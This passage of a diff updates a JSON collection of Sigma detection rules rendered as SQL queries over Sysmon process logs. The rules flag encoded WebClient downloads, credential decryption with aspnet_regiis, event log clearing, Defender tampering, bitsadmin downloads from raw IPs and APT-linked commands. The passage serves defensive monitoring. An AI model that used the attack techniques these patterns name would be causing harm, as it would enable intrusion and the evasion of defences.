'%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" + "filename": "proc_creation_win_powershell_webclient_casing.yml" }, { - "title": "Sysinternals PsService Execution", - "id": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", - "status": "experimental", - "description": "Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Remote Child Process From Outlook", + "id": "e212d415-0e93-435f-9e1a-f29005bb4723", + "status": "test", + "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.persistence", - "attack.t1543.003" + "attack.execution", + "attack.t1059", + "attack.t1202" ], "falsepositives": [ - "Legitimate use of PsService by an administrator" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'psservice.exe' OR (Image LIKE '%\\\\PsService.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' AND Image LIKE '\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_psservice.yml" + "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml" }, { - "title": "Defrag Deactivation", - "id": "958d81aa-8566-4cea-a565-59ccd4df27b0", + "title": "Suspicious RDP Redirect Using TSCON", + "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", "status": "test", - "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", - "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", + "description": "Detects a suspicious RDP session redirect using tscon.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005", - "attack.s0111" + "attack.lateral_movement", + "attack.t1563.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '%/delete%' ESCAPE '\\' OR CommandLine LIKE '%/change%' ESCAPE '\\') AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_slingshot.yml" + "filename": "proc_creation_win_tscon_rdp_redirect.yml" }, { - "title": "Microsoft IIS Connection Strings Decryption", - "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", + "title": "Potential Windows Defender Tampering Via Wmic.EXE", + "id": "51cbac1e-eee3-4a90-b1b7-358efb81fa0a", "status": "experimental", - "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", - "author": "Tim Rauch", + "description": "Detects potential tampering with Windows Defender settings such as adding exclusion using wmic", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1003" + "attack.t1546.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '%/Namespace:\\\\\\\\root\\\\Microsoft\\\\Windows\\\\Defender%' ESCAPE '\\')" ], - "filename": "proc_creation_win_iis_connection_strings_decryption.yml" + "filename": "proc_creation_win_wmic_namespace_defender.yml" }, { - "title": "APT31 Judgement Panda Activity", - "id": "03e2746e-2b31-42f1-ab7a-eb39365b2422", + "title": "Suspicious Execution of Hostname", + "id": "7be5fb68-f9ef-476d-8b51-0256ebece19e", "status": "test", - "description": "Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report", - "author": "Florian Roth (Nextron Systems)", + "description": "Use of hostname to get information", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.credential_access", - "attack.g0128", - "attack.t1003.001", - "attack.t1560.001" + "attack.discovery", + "attack.t1082" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\HOSTNAME.EXE' ESCAPE '\\')" + ], + "filename": "proc_creation_win_hostname_execution.yml" + }, + { + "title": "Recon Information for Export with Command Prompt", + "id": "aa2efee7-34dd-446e-8a37-40790a66efd7", + "status": "experimental", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "author": "frack113", + "tags": [ + "attack.collection", + "attack.t1119" + ], + "falsepositives": [ + "Unknown" + ], + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ldifde%' ESCAPE '\\' AND CommandLine LIKE '%-f -n%' ESCAPE '\\' AND CommandLine LIKE '%eprod.ldf%' ESCAPE '\\') OR (CommandLine LIKE '%copy \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%c$%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\aaaa\\\\procdump64.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\netsess.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\7za.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\aaaa\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tree.com' ESCAPE '\\' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR Image LIKE '%\\\\doskey.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\') OR OriginalFileName IN ('wmic.exe', 'DOSKEY.EXE', 'sc.exe')) AND (ParentCommandLine LIKE '% > \\%TEMP\\%\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\%TMP\\%\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt31_judgement_panda.yml" + "filename": "proc_creation_win_susp_recon.yml" }, { - "title": "CMSTP Execution Process Creation", - "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", + "title": "Suspicious Eventlog Clear or Configuration Change", + "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", + "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1070.001", + "attack.t1562.002", + "car.2016-04-002" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Maintenance activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmstp.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmstp_execution_by_creation.yml" + "filename": "proc_creation_win_susp_eventlog_clear.yml" }, { - "title": "Potential Defense Evasion Via Binary Rename", - "id": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", - "status": "test", - "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "author": "Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades)", + "title": "Unsigned AppX Installation Attempt Using Add-AppxPackage", + "id": "37651c2a-42cd-4a69-ae0d-22a4349aa04a", + "status": "experimental", + "description": "Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.persistence", + "attack.defense_evasion" ], "falsepositives": [ - "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist" + "Installation of unsigned packages for testing purposes" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName IN ('Cmd.Exe', 'CONHOST.EXE', '7z.exe', 'WinRAR.exe', 'wevtutil.exe', 'net.exe', 'net1.exe', 'netsh.exe', 'InstallUtil.exe') AND NOT ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\WinRAR.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AppPackage %' ESCAPE '\\' OR CommandLine LIKE '%Add-AppxPackage %' ESCAPE '\\') AND CommandLine LIKE '% -AllowUnsigned%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_binary.yml" + "filename": "proc_creation_win_powershell_install_unsigned_appx_packages.yml" }, { - "title": "Potential MsiExec Masquerading", - "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", + "title": "Exploit for CVE-2017-0261", + "id": "864403a1-36c9-40a2-a982-4c9a45f7d833", "status": "test", - "description": "Detects the execution of msiexec.exe from an uncommon directory", + "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unknown" + "Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\FLTLDR.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_msiexec_masquerading.yml" + "filename": "proc_creation_win_exploit_cve_2017_0261.yml" }, { - "title": "Windows Share Mount Via Net.EXE", - "id": "f117933c-980c-4f78-b384-e3d838111165", + "title": "Suspicious SysAidServer Child", + "id": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", "status": "experimental", - "description": "Detects when a share is mounted using the \"net.exe\" utility", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], + "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate activity by administrators and scripts" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%SysAidServer%' ESCAPE '\\')" ], - "filename": "proc_creation_win_net_use_mount_share.yml" + "filename": "proc_creation_win_java_sysaidserver_susp_child_process.yml" }, { - "title": "Suspicious DLL Loaded via CertOC.EXE", - "id": "84232095-ecca-4015-b0d7-7726507ee793", - "status": "experimental", - "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", + "id": "ebef4391-1a81-4761-a40a-1db446c0e625", + "status": "test", + "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Legitimate software creating script event consumers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" ], - "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" + "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" }, { - "title": "Suspicious VBoxDrvInst.exe Parameters", - "id": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", - "status": "test", - "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\n", - "author": "Konstantin Grishchenko, oscd.community", + "title": "Suspicious Download From Direct IP Via Bitsadmin", + "id": "99c840f2-2012-46fd-9141-c761987550ef", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\VBoxDrvInst.exe' ESCAPE '\\' AND CommandLine LIKE '%driver%' ESCAPE '\\' AND CommandLine LIKE '%executeinf%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine 